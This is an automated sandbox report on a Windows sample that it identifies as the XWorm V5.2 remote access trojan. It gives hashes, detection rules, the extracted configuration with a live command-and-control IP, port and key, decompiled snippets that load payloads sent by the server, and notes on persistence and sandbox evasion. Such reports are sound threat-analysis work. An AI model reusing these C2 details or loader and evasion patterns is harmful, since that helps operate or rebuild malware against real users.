Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inject.exe

Overview

General Information

Sample name:inject.exe
Analysis ID:1465712
MD5:48d87e281c7d316d72677c80ecd02e29
SHA1:0a274418f78672b8515183a9241fff465e9e8591
SHA256:e37072b84bc4474b48997ac346582ab4040659a31edacbb88fb59d56609ba2d9
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • inject.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\inject.exe" MD5: 48D87E281C7D316D72677C80ECD02E29)
    • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA40.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7788 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup
{"C2 url": ["79.110.49.233"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
SourceRuleDescriptionAuthorStrings
inject.exeJoeSecurity_XWormYara detected XWormJoe Security
    inject.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x735c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x73f9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x750e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x71ce:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\VSREDIST.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\VSREDIST.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x735c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x73f9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x750e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x71ce:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1526464486.000000000273C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x715c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x71f9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x730e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6fce:$cnc4: POST / HTTP/1.1
          Process Memory Space: inject.exe PID: 7500JoeSecurity_XWormYara detected XWormJoe Security
            SourceRuleDescriptionAuthorStrings
            0.0.inject.exe.490000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.0.inject.exe.490000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x735c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x73f9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x750e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x71ce:$cnc4: POST / HTTP/1.1

              System Summary

              barindex
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\VSREDIST.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\inject.exe, ProcessId: 7500, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSREDIST
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\inject.exe, ProcessId: 7500, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSREDIST.lnk
              Timestamp:07/02/24-00:30:09.393465
              SID:2852870
              Source Port:7000
              Destination Port:49705
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: inject.exeMalware Configuration Extractor: Xworm {"C2 url": ["79.110.49.233"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
              Source: C:\Users\user\AppData\Roaming\VSREDIST.exeReversingLabs: Detection: 78%
              Source: inject.exeReversingLabs: Detection: 78%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\VSREDIST.exeJoe Sandbox ML: detected
              Source: inject.exeJoe Sandbox ML: detected
              Source: inject.exeString decryptor: 79.110.49.233
              Source: inject.exeString decryptor: 7000
              Source: inject.exeString decryptor: <123456789>
              Source: inject.exeString decryptor: <Xwormmm>
              Source: inject.exeString decryptor: XWorm V5.2
              Source: inject.exeString decryptor: USB.exe
              Source: inject.exeString decryptor: %AppData%
              Source: inject.exeString decryptor: VSREDIST.exe
              Source: inject.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: inject.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 79.110.49.233:7000 -> 192.168.2.8:49705
              Source: Malware configuration extractorURLs: 79.110.49.233
              Source: global trafficTCP traffic: 192.168.2.8:49705 -> 79.110.49.233:7000
              Source: Joe Sandbox ViewASN Name: OTAVANET-ASCZ OTAVANET-ASCZ
              Source: inject.exe, 00000000.00000002.1526464486.00000000026AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

              System Summary

              barindex
              Source: inject.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.inject.exe.490000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\VSREDIST.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\inject.exeCode function: 0_2_00007FFB4B170E690_2_00007FFB4B170E69
              Source: C:\Users\user\Desktop\inject.exeCode function: 0_2_00007FFB4B1776D20_2_00007FFB4B1776D2
              Source: C:\Users\user\Desktop\inject.exeCode function: 0_2_00007FFB4B179CAD0_2_00007FFB4B179CAD
              Source: C:\Users\user\Desktop\inject.exeCode function: 0_2_00007FFB4B1769260_2_00007FFB4B176926
              Source: inject.exe, 00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameyapp.exe4 vs inject.exe
              Source: inject.exe, 00000000.00000002.1526629546.00000000126A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameyapp.exe4 vs inject.exe
              Source: inject.exeBinary or memory string: OriginalFilenameyapp.exe4 vs inject.exe
              Source: inject.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: inject.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.inject.exe.490000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Roaming\VSREDIST.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: inject.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: inject.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: inject.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: VSREDIST.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: VSREDIST.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: VSREDIST.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: VSREDIST.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: VSREDIST.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: inject.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: inject.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: inject.exe, 00000000.00000002.1525833338.000000000095C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
              Source: classification engineClassification label: mal100.troj.evad.winEXE@7/5@0/1
              Source: C:\Users\user\Desktop\inject.exeFile created: C:\Users\user\AppData\Roaming\VSREDIST.exeJump to behavior
              Source: C:\Users\user\Desktop\inject.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
              Source: C:\Users\user\Desktop\inject.exeMutant created: \Sessions\1\BaseNamedObjects\rGwGQiDRPDEWiZN6
              Source: C:\Users\user\Desktop\inject.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA40.tmpJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA40.tmp.bat""
              Source: inject.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: inject.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\inject.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\inject.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: inject.exeReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\inject.exeFile read: C:\Users\user\Desktop\inject.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\inject.exe "C:\Users\user\Desktop\inject.exe"
              Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA40.tmp.bat""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
              Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA40.tmp.bat""Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\inject.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
              Source: VSREDIST.lnk.0.drLNK file: ..\..\..\..\..\VSREDIST.exe
              Source: inject.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: inject.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: inject.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: inject.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: inject.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: VSREDIST.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: VSREDIST.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: VSREDIST.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: inject.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: inject.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: inject.exe, Messages.cs.Net Code: Memory
              Source: VSREDIST.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: VSREDIST.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: VSREDIST.exe.0.dr, Messages.cs.Net Code: Memory
              Source: C:\Users\user\Desktop\inject.exeFile created: C:\Users\user\AppData\Roaming\VSREDIST.exeJump to dropped file
              Source: C:\Users\user\Desktop\inject.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSREDIST.lnkJump to behavior
              Source: C:\Users\user\Desktop\inject.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSREDIST.lnkJump to behavior
              Source: C:\Users\user\Desktop\inject.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VSREDISTJump to behavior
              Source: C:\Users\user\Desktop\inject.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VSREDISTJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\inject.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\inject.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\inject.exeMemory allocated: 1A690000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\inject.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\inject.exeWindow / User API: threadDelayed 2825Jump to behavior
              Source: C:\Users\user\Desktop\inject.exeWindow / User API: threadDelayed 7032Jump to behavior
              Source: C:\Users\user\Desktop\inject.exe TID: 7644Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\inject.exe TID: 7648Thread sleep count: 2825 > 30Jump to behavior
              Source: C:\Users\user\Desktop\inject.exe TID: 7648Thread sleep count: 7032 > 30Jump to behavior
              Source: C:\Users\user\Desktop\inject.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\inject.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\inject.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: inject.exe, 00000000.00000002.1525833338.0000000000A12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_C
              Source: inject.exe, 00000000.00000002.1526954634.000000001B660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\inject.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\inject.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA40.tmp.bat""Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
              Source: C:\Users\user\Desktop\inject.exeQueries volume information: C:\Users\user\Desktop\inject.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\inject.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\inject.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: inject.exe, 00000000.00000002.1526954634.000000001B6AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\inject.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: inject.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.inject.exe.490000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1526464486.000000000273C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: inject.exe PID: 7500, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\VSREDIST.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: inject.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.inject.exe.490000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1526464486.000000000273C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: inject.exe PID: 7500, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\VSREDIST.exe, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts11
              Windows Management Instrumentation
              1
              Scripting
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping221
              Security Software Discovery
              Remote Services11
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job21
              Registry Run Keys / Startup Folder
              21
              Registry Run Keys / Startup Folder
              1
              Disable or Modify Tools
              LSASS Memory131
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              DLL Side-Loading
              131
              Virtualization/Sandbox Evasion
              Security Account Manager1
              Application Window Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS1
              File and Directory Discovery
